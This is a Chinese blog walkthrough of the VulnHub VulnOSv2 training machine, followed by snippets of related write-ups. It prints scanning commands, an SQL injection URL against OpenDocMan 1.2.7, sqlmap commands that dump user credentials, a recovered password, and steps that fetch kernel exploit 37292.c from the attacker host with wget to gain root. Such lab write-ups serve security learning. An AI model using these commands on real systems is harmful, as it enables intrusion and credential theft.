vulnhub靶场vulnosv2靶场

最新推荐文章于 2024-01-29 14:37:43 发布
最新推荐文章于 2024-01-29 14:37:43 发布
阅读量199 收藏
点赞数
分类专栏: vulnhub靶场 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzzzzzkeai/article/details/128236860
版权

vulnhub靶场–vulnosv2靶场

信息收集

主机发现

ifconfig
在这里插入图片描述
nmap 192.168.17.0/24 在这里插入图片描述

端口扫描

nmap -sS -sV -A 192.168.17.135 -p-[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-qlr25rWw-1670482125650)(C:\Users\嘿嘿也不太行\AppData\Roaming\Typora\typora-user-images\image-20221111231619786.png)]

目录扫描

dirb http://192.168.17.135
在这里插入图片描述
dirsearch -u http://192.168.17.135
在这里插入图片描述

http://192.168.17.135/index.html
http://192.168.17.135/javascript/jquery/jquery
http://192.168.17.135/javascript/jquery/version

中间件

在这里插入图片描述

威胁建模

渗透攻击

访问http://192.168.17.135/index.html
在这里插入图片描述
然后点击页面跳转到http://192.168.17.135/jabc/
在这里插入图片描述
在documentation目录下是一片黑
在这里插入图片描述
然后再源码里看到啦一个目录
在这里插入图片描述
然后在源码里也可以看到这些子的颜色是黑色所以我们之前没有发现
在这里插入图片描述
进入http://192.168.17.135/jabcd0cs/目录
在这里插入图片描述
可以看到
在这里插入图片描述
cms opendocman 1.2.7
在这里插入图片描述
搜索一下是否有漏洞
在这里插入图片描述
有两个漏洞

http://192.168.17.135/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,v
ersion%28%29,3,4,5,6,7,8,9

在这里插入图片描述
在这里插入图片描述
直接上sqlmap吧

sqlmap -u "http://192.168.17.135/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20" -level=3 -risk=3 --dbs

在这里插入图片描述

sqlmap -u "http://192.168.17.135/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20" -level=3 -risk=3 -D jabcd0cs --tables

在这里插入图片描述

sqlmap -u "http://192.168.17.135/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20" -level=3 -risk=3 -D jabcd0cs -T odm_admin --columns

在这里插入图片描述

sqlmap -u "http://192.168.17.135/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20" -level=3 -risk=3 -D jabcd0cs -T odm_user --columns

在这里插入图片描述

sqlmap -u "http://192.168.17.135/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -level=3 -risk=3 -D jabcd0cs -T odm_user -C username,password --dump

在这里插入图片描述
在这里插入图片描述
webmin 密码webmin1980
ssh连接

后渗透攻击

ssh连接
在这里插入图片描述
在这里插入图片描述
python -m SimpleHTTPServer 8888
wget http://192.168.17.128:8888/37292.c
在这里插入图片描述
将提权脚本传输过来
然后编译gcc 37292.c -o heihei
在这里插入图片描述
是root权限啦然后就是查看flag
在这里插入图片描述

嘿嘿也不太行!
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
VulnHub靶场系列:Chili
快吃小蛋糕吧的博客
10-05 1346
VulnHub靶场系列:Chili 刚刚在VulnHub官网上找了些简单的靶机,感觉这个还挺适合新手的 环境部署: https://download.vulnhub.com/chili/Chili.ova 实战: 首先使用工具扫描靶机所在网段,得到靶机IP: root@kali:/# nmap -sP 192.168.200.129/24 Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-05 08:56 CST Nmap scan report f
vulnhub靶场库中 DC:1
07-06
1. **Vulnhub靶场库与DC:1介绍** Vulnhub是一个在线资源库,提供了一系列虚拟机镜像,这些镜像设计为安全学习和实践平台,尤其是对于网络安全初学者。DC:1是Vulnhub靶场库中的一个特定靶机,它旨在帮助用户学习和...
Vulnosv2 靶机训练
weixin_43999483的博客
03-02 224
参考博客传送门 关键点:web系统可能在msf中保留有漏洞记录,找到相对应的版本攻击点进行攻击 searchsploit OpenDocMan 1.2.7 一般存放目录都放在 /usr/share/exploitdb下面 获得低权限用户后 可以考虑Linux内核提权 searchsploit Linux 3.13.0 搭建一个文件服务器 python -m SimpleHTTPServer 6666 下载 wget http://xxx.xxx.xxx.xxx 如果是c类型文件,需要gcc编译 找
Vulnhub系列:VulnOSv2
Ays.Ie的博客
03-05 457
继续更新vulnhub的靶机,巩固渗透技术,分享做题思路,打开思维局限
渗透测试靶机----VulnOsv2
久恙502的博客
01-29 412
渗透测试,打靶经历记录,大佬多多指点,谢谢!!!
Vulnhub靶机实战-Warzone 2
黑白的博客
01-10 398
声明 好好学习,天天向上 搭建 使用virtualbox打开,网络配置和我的PRESIDENTIAL文章一样,是要vmware和virtualbox互连 渗透 存活扫描,发现目标 arp-scan -l nmap -sP 192.168.239.1/24 端口扫描 nmap -T4 -A 192.168.239.10 -p 1-65535 -oN nmap.A 开启端口 21,22,1337 以匿名用户登录ftp 三张图片分别是用户名密码和token,旗语吗?只在亮剑里面看过旗语 对照解密后: u
Vulnhub靶场题解
08-24
介绍靶场的习题解答技巧,由红日团队精心编制,红日团队凭借多年经验于本文档
Vulnhub靶场题解.html
08-12
Vulnhub靶场题解.,适合渗透测试人员学习交流
vulnhub靶场实战系列-DC-2实战
最新发布
05-18
vulnhub靶场实战系列-DC-2实战
VulnHub靶场MONEYBOX:1
01-05
VulnHub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透测试使用。MONEYBOX:1是VulnHub上的一个靶场环境,提供了虚拟机镜像,可以在本地安装并尝试完成渗透测试任务。这个靶场类似于一个游戏,需要逐步完成...
Vulnhub-靶机-VulnOSv2
qq_43264813的博客
03-01 460
Vulnhub—靶机—Kioptrix: Level 1 (#1) 本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关 文章目录Vulnhub—靶机—Kioptrix: Level 1 (#1)一、信息收集二、漏洞利用三、Flag 一、信息收集 【步骤一】使用nmap确定目标靶机地址: 【命令】nmap -sP 192.168.43.0/24 【步骤二】对目标靶机进行全端口扫描: 【命令】nmap -n -sC -sV -p- 192.1
Vulnhub 靶机 VulnOSv2 write up opendocman cms 32075 sql注入 账号密码 ssh连接 37292.c 脏牛提权
YouthBelief的博客
12-05 2274
VulnOSv2 write up0x00 环境搭建0x01 信息收集0x02 漏洞挖掘web思路步骤一:枚举目录+主页挖掘步骤二:OpenDocMan v1.2.7 cms利用步骤三:尝试利用账号面ssh连接webmin0x03 提权步骤四:内核漏洞提权0x04 总结 0x00 环境搭建 VritualBox配置网络为 host-only VMware中kali加入 host-only 为Virtual Box的网卡 开启虚拟机报错 usb 2.0 什么的问题 修改usb设备为1.0 0x01 信息
VulnHub靶机-VulnOs-2
Slow_的博客
02-24 626
VulnHub靶机-VulnOs-2 下载地址:https://www.vulnhub.com/entry/vulnos-2,147/ 下载靶机后在VirtualBox下打开,网卡配置为桥接 任务:提权并获取flag 攻击机:kali linux 192.168.8.108 靶机:192.168.8.107 文章目录VulnHub靶机-VulnOs-2一、信息搜集一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 一、信息搜集 首先nmap探测存活靶机 命令:nmap -sP 192.168.8
vulnhub VulnOS: 2
箭雨镜屋
12-05 2538
本文思路:nmap端口扫描-->访问网站搜集信息-->利用OpenDocMan v1.2.7的sql注入漏洞获取webmin用户的密码-->webmin用户ssh登录搜集信息-->利用内核版本漏洞提权(或者 爆破postgresql用户名密码-->postgresql中获得vulnosadmin的密码-->通过vulnosadmin用户目录下的r00t.blend文件获得root用户密码)
vulnhub靶场SkyTower靶场
zzzzzzkeai的博客
12-08 542
vulnhub靶场--SkyTower靶场
Vulnhub靶场----8、DC-8
七天
03-03 745
Vulnhub-DC8
vulnhub靶场3:The Planets Earth
Genarior的专栏
03-31 147
vulnhub靶场练习
14-vulnhub-VulnOS:2
尼德霍格007
08-05 213
vulnhub-VulnOS: 2 靶机地址:https://www.vulnhub.com/entry/vulnos-2,147/ 目标:得到root权限&找到flag.txt 作者:尼德霍格007 时间:2021-8-5 一、信息收集 nmap扫描ip地址 nmap -sP 10.0.2.0/24 扫描到靶机地址是10.0.2.4 扫描端口 nmap -A -p 1-60000 10.2.0.4 看到他开放了这几个端口 先访问一下80端口web服务,发现了另一个链接,点开 前三个模块
Vulnhub靶机 VULNOS: 2 writeup
xingjinhao123的博客
02-10 3038
下载地址:https://www.vulnhub.com/entry/vulnos-2,147/ 信息搜集 获取IP地址 扫描端口 80端口 点击website跳转到/jabc 在 jabc/?q=node/7 页面看起来啥也没有,但是Ctrl+A全选之后看到提示还有一个目录 /jabcd0cs/ 访问/jabcd0cs/ 在/jabcd0cs/发现CMS的版本,使用searchsploit查询 这里看到了pyload http://[host]/ajax_udf.php?q=1&amp
vulnhub靶场通关
09-09
vulnhub靶场是一个用于学习和测试网络安全技能的平台。通关vulnhub靶场需要进行一系列的渗透测试和漏洞利用操作。根据引用中提供的目录,以下是一个通关vulnhub靶场的大致步骤: 1. 环境搭建:下载靶场环境,并启动...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值